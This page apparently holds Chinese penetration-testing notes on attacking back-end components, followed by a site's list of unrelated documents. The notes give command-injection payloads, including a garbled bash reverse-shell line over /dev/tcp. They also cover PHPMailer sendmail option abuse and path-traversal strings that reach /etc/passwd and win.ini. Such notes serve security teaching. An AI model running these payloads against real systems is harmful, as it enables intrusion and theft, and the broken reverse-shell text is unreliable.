攻击后端组件
攻击后端组件;操作系统:Linux/Windows;Web服务器内置的API与OS直接进行交互
PHP:exec()
ASP:wscript.shell()
JSP:Runtime.getRuntime().exec()
Python: os.system()、popen()
用户可控制输入参数
程序员过滤不严格;字符;字符;基本时间延迟推断
【|| ping -c 30 || ping -n 30 】
输出回显测试
【ls;dir】
反弹shell测试
【bash?-i??/dev/tcp//8080?01】
提权
横向破坏
;nslookup
wget
-o
sendmail(CVE-2016-10033中,PHPMailer的RCE)
-X logfile是记录log文件的,就是可以写文件;
-C file是临时加载一个配置文件,就是可以读文件;
-O option=value 是临时设置一个邮件存储的临时目录的配置。
;路径遍历漏洞
/1/2/../../../../../../../etc/passwd
/1/2/../../../../../../../windows/win.ini
确定攻击目标
路径
参数:file=../../../../../etc/passwd
文件上传/下载、说明文档、上传图像
基本测试 f=a/b.txt VS f=a/c/../b.
您可能关注的文档
- 换热器的分类详解.pptx
- 振动理论及应用21.ppt
- 掌握图的结构特征,掌握图的建立及遍历运算的实现。.doc
- 挖掘作业安全管理规范培训课件.ppt
- 掌上明珠定制衣柜-产品卖点.ppt
- 捷达5V 发动机电控1系统.ppt
- 排水管道系统设计终稿.doc
- 排烟余热利用技术分析.docx
- 排污申报计算.ppt
- 排矸系统方案说明书.doc
- ORing工业网络解决方案.pdf
- 如何使用XMind与制作3:4比例美观图片.pdf
- 重症医学相关精神障碍药物合理使用专家共识解读.pptx
- 重症医学专业医疗质量控制指标(2024年版).pptx
- 重症医学专业医疗质量控制指标(2024年版)解读.pptx
- “鸭力全消 喜乐出圈”商场购物中心五一玩梗出圈季活动方案.pptx
- 商场购物中心大悦城(潮π广场)打造计划美陈升级改造方案.pptx
- MUSIC FESTIVAL音乐节线上整合营销传播运营策划方案.pptx
- 26HR-162:企业招聘分析:招聘配置工作总结分析报告.pdf
- 白酒国窖1573冰·JOYS夏季交响音乐品鉴私宴会营销活动方案.pptx
原创力文档

文档评论(0)